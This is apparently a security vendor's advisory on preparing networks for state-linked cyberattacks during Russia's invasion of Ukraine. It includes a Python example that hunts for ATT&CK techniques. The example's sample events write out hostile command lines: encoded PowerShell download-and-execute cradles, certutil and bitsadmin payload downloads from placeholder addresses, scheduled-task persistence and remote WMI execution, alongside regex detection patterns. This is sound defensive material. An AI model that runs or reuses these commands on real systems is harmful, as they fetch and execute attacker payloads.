Ukraine Invasion Cyberattack Preparation
Russia has invaded Ukraine and has warned outside parties that any interference will be met with retaliation. Cyber attacks against targets in Ukraine are nothing new, though their tempo has increased recently. While it is important not to attribute attacks to Russia prematurely, Russia has a history of attacking foreign companies and nation-states, so it is strongly advisable for us to prepare for attacks that may land at our own front doors.
Meanwhile, many countries have imposed sanctions on Russia, and cyber attacks have been carried out against Russia in return, including some claimed by third parties such as Anonymous.
All of this activity has many organizations concerned about what they can do to protect themselves from being exploited. We have initiated some activities with our customers to aid them in preparations to protect their networks but feel it is prudent to issue a more general statement to our entire customer base.
Fundamentally, basic cyber security practices and procedures are the foundation for protecting your environment. Defending against a state actor starts from that same foundation, and although it can feel daunting, you likely already have many of these practices in place in your organization:
- Get informed, stay informed
  - The situation is evolving constantly.
- Ensure that all systems are patched appropriately and in a timely manner.
  - Critical vulnerabilities should be patched as soon as possible, as they are the most likely to be used in wide-scale attacks.
  - Pay special attention to anything that is:
    - publicly facing (VPN concentrators, firewalls, web servers and web applications, etc.)
    - used interactively by end users (workstations and laptops)
- Ensure that all critical systems have been backed up. If you are compromised, a full recovery relies on functional backups.
  - Ensure that your backup systems have been tested recently for recovery: actually restore data, rather than relying on the backup job reporting success.
  - Offline (disconnected) copies are the priority in a cyber attack, because attackers routinely delete or encrypt any backup they can reach over the network. Make sure you have an offline copy of your data.
  - Cyber attacks are unlikely to physically damage on-site backups, so if you don't have an offsite backup plan you should still build one, but it is less urgent than establishing offline backups as soon as possible.
  - Follow proper backup practices and ensure that data is "pulled" from the source by the backup system, rather than "pushed" to the target by the source. The source then holds no credentials for the backup target (for example, the backup server connects to the source with a read-only account), so a compromised system cannot delete, encrypt, or otherwise render already created backups unusable for online or rapid recovery.
- Security signature updates
  - Ensure that all information security systems are configured appropriately.
  - All endpoints should have anti-malware and monitoring software (EDR) deployed. Even some of the free EDR tools are worthwhile; although they lack some enterprise features, they are better than having none at all.
  - Network intrusion detection/prevention systems should have up-to-date signatures and be configured to pull updates automatically from the vendor.
  - Signature packs for IPS and IDS sensors should be enabled for the platforms and applications actually present in the environment; rule sets for systems you do not run only add noise.
  - IOC-based alerting can be useful, but only with the most up-to-date IOCs. Out-of-date IOCs are ineffective at best; at worst they distract your response team from where it should really be focusing.
- User awareness training
  - Targeting users remains an ever-popular tactic, especially among APT groups affiliated with Russia and the Russian state.
  - Ensuring that your users are equipped to resist phishing could be what prevents your organization from being compromised.
  - Conduct phishing awareness and testing campaigns: send simulated phishing content to your users and measure click and report rates to identify weak spots.
- Perform threat hunting
  - Many state actors, Russian groups included, have well-documented TTPs (Tactics, Techniques and Procedures) that they commonly employ.
  - MITRE ATT&CK is incredibly useful for identifying the specific TTPs of state actors. APT28, APT29, Gamaredon Group, Indrik Spider, TEMP.Veles, Sandworm Team, Silence, Turla and Wizard Spider are all groups that have been identified as Russian attackers or as groups that target Ukrainian organizations.
  - The Canadian Centre for Cyber Security has issued a bulletin regarding Russian state-sponsored cyber threats to Canadian infrastructure operators. It also references the US Cybersecurity & Infrastructure Security Agency (CISA) alert, revised earlier this week, regarding Russian cyber threats to US critical infrastructure.
  - Look for these TTPs on your network, focusing on those used by currently active groups. Log monitoring and system and network monitoring are all useful tools in threat hunting.
- Test security tooling
  - Using the list of TTPs likely to be used in an attack, recreate them in your environment and validate that your security tooling identifies them.
  - Tooling ranges from commercial breach-and-attack-simulation products (Cymulate, Metasploit Pro) to open-source tooling (Atomic Red Team by Red Canary, the Metasploit Framework) that can be used to simulate specific attacks in your organization.
- Respond to incidents
  - It is not enough to know you are being attacked; you need a plan to respond. Incident response plans and business continuity plans assist when an attack occurs in your environment.
  - If you have your own incident response team, run tabletop exercises to practice.
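The threat-hunting and tooling-validation steps above, as an added example that is not Secure Sense's code or the code of any product named on this page: a few ATT&CK-aligned detections (encoded PowerShell download cradles, certutil/bitsadmin downloads, and scheduled tasks whose action lives in a user-writable path) are run over constructed Sysmon-style process-creation events, and then a coverage check replays one simulated event per technique, including one (remote process creation via WMI, T1047) for which no rule exists, so the gap is visible. Field names, host names and the 198.51.100.x documentation addresses are assumptions made up for the example.

```python
"""Hunt for a few ATT&CK techniques in process telemetry, then replay simulated
events to confirm the detections fire (added example; field names, hosts and
198.51.100.x addresses are constructed for illustration)."""
import base64
import re
from typing import Callable, Dict, List

Event = Dict[str, str]
Detector = Callable[[Event], bool]


def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand expects base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS: List[Event] = [
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"host": "ws02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/x.exe C:\Users\Public\x.exe"},
    {"host": "srv01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /SC ONLOGON /TN Updater /TR "C:\Users\bob\AppData\Roaming\u.exe" /RU SYSTEM'},
    {"host": "ws03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},  # benign admin script
]

ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
CRADLE_RE = re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|invoke-expression|\biex\b")
TRANSFER_RE = re.compile(r"(?i)certutil(?:\.exe)?\s.*-urlcache|bitsadmin(?:\.exe)?\s.*/transfer")
TASK_RE = re.compile(r"(?i)schtasks(?:\.exe)?\s.*/create")
TASK_CMD_RE = re.compile(r'(?i)/tr\s+"?([^"]+)"?')
USER_WRITABLE_RE = re.compile(r"(?i)\\(?:AppData|Temp|Users\\Public|ProgramData)\\")


def t1059_001_encoded_powershell(ev: Event) -> bool:
    """T1059.001: decode -EncodedCommand and look for a download-and-execute cradle."""
    if "powershell" not in ev["image"].lower():
        return False
    m = ENC_RE.search(ev["cmdline"])
    if not m:
        return False
    try:
        script = base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except ValueError:  # not valid base64; leave it for other rules
        return False
    return bool(CRADLE_RE.search(script))


def t1105_ingress_tool_transfer(ev: Event) -> bool:
    """T1105: built-in Windows downloaders used to fetch a payload."""
    return bool(TRANSFER_RE.search(ev["cmdline"]))


def t1053_005_scheduled_task(ev: Event) -> bool:
    """T1053.005: new scheduled task whose action lives in a user-writable path."""
    cmd = ev["cmdline"]
    if not TASK_RE.search(cmd):
        return False
    m = TASK_CMD_RE.search(cmd)
    return bool(m and USER_WRITABLE_RE.search(m.group(1)))


DETECTORS: Dict[str, Detector] = {
    "T1059.001": t1059_001_encoded_powershell,
    "T1105": t1105_ingress_tool_transfer,
    "T1053.005": t1053_005_scheduled_task,
}


def hunt(events: List[Event], detectors: Dict[str, Detector] = DETECTORS) -> List[Dict[str, str]]:
    """Threat-hunting pass: one hit per (event, technique) pair that matches."""
    return [{"host": ev["host"], "technique": tid, "cmdline": ev["cmdline"]}
            for ev in events for tid, fn in detectors.items() if fn(ev)]


# Constructed simulation events, one per technique we intend to cover, plus
# T1047 (remote process creation via WMI), for which no rule exists above.
SIMULATED: Dict[str, Event] = {
    "T1059.001": {"host": "lab", "image": "powershell.exe",
                  "cmdline": "powershell -enc " + encode_ps("iex (iwr http://198.51.100.9/p).Content")},
    "T1105": {"host": "lab", "image": "bitsadmin.exe",
              "cmdline": r"bitsadmin /transfer job /download /priority high http://198.51.100.9/t C:\Users\Public\t.exe"},
    "T1053.005": {"host": "lab", "image": "schtasks.exe",
                  "cmdline": r"schtasks /create /sc minute /mo 5 /tn Sync /tr C:\Users\alice\AppData\Local\s.exe"},
    "T1047": {"host": "lab", "image": "wmic.exe",
              "cmdline": 'wmic /node:srv02 process call create "cmd.exe /c whoami"'},
}


def validate_coverage(simulated: Dict[str, Event] = SIMULATED,
                      detectors: Dict[str, Detector] = DETECTORS) -> Dict[str, bool]:
    """Tooling test: did at least one detector fire for each simulated technique? False = gap."""
    return {tid: any(fn(ev) for fn in detectors.values()) for tid, ev in simulated.items()}


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"HIT {hit['technique']} on {hit['host']}: {hit['cmdline'][:70]}")
    for tid, covered in validate_coverage().items():
        print(f"{tid}: {'detected' if covered else 'COVERAGE GAP - add or tune a rule'}")
```

Run as-is, the hunting pass flags ws01, ws02 and srv01 and leaves the benign ws03 script alone, and the coverage report shows T1047 as a gap. In a real environment the constructed events would be replaced by a process-creation export from your EDR or SIEM, and the simulated events by the telemetry produced while running the corresponding Atomic Red Team tests, so the same report tells you which TTPs your tooling would have missed.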
Secure Sense recommends that you take proactive and deliberate steps to harden your environment, reducing the likelihood of significant impact to your organization. A combination of strong preventative technologies coupled with detective practices will help minimize any effects. If you need assistance with any of these steps, or would like to discuss what you can do to secure your organization and infrastructure, email us at firstname.lastname@example.org.
Secure Sense is the security provider that cares. We are a team of experts with a passion for IT and protecting your organization is what motivates us daily. If you have questions or want to learn more about how we can improve your organization’s security, our services or just want to chat security please give us a shout.